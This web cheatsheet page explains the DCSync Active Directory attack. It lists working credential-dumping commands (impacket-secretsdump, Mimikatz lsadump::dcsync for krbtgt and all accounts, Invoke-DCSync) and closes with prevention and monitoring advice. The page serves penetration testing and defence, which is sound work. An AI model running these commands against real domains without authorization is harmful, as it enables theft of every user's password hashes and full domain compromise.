Back to Active Directory

Dcsync

Active Directory cheatsheet — Active Directory enumeration and attack techniques.

Overview

DCSync is a powerful AD attack that allows an attacker with appropriate privileges (Domain Admin, Enterprise Admin, or specific replication rights) to impersonate a domain controller and replicate user credentials from the domain.

The attack uses the MS-DRSR (Directory Replication Service) protocol to request replication of password hashes from the domain controller.

Category: Active Directory — Active Directory enumeration and attack techniques.

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting Dcsync:

impacket-secretsdump -just-dc domain.local/user:password@10.10.10.10
impacket-secretsdump -just-dc-user administrator domain.local/user:password@10.10.10.10
lsadump::dcsync /domain:domain.local /user:krbtgt (Mimikatz)
lsadump::dcsync /domain:domain.local /all (Mimikatz)
Invoke-DCSync -PWDumpFormat (PowerShell)

Tools & Techniques

Recommended tools for Dcsync:

  • Impacket secretsdump: remote DCSync via DRSUAPI
  • Mimikatz lsadump::dcsync: local DCSync execution
  • PowerView/Invoke-DCSync: PowerShell-based DCSync
  • Requires: Replication-Get-Changes-All privilege

Prevention & Mitigation

Security recommendations to prevent Dcsync:

  • Restrict who has Replication-Get-Changes-All rights
  • Use privileged access workstations (PAWs) for admin accounts
  • Enable Advanced Audit Policy for directory service access
  • Monitor Event ID 4662 (Replication rights usage)
  • Implement just-in-time (JIT) administration models
  • Regularly review and remove excessive replication permissions

References

Additional resources: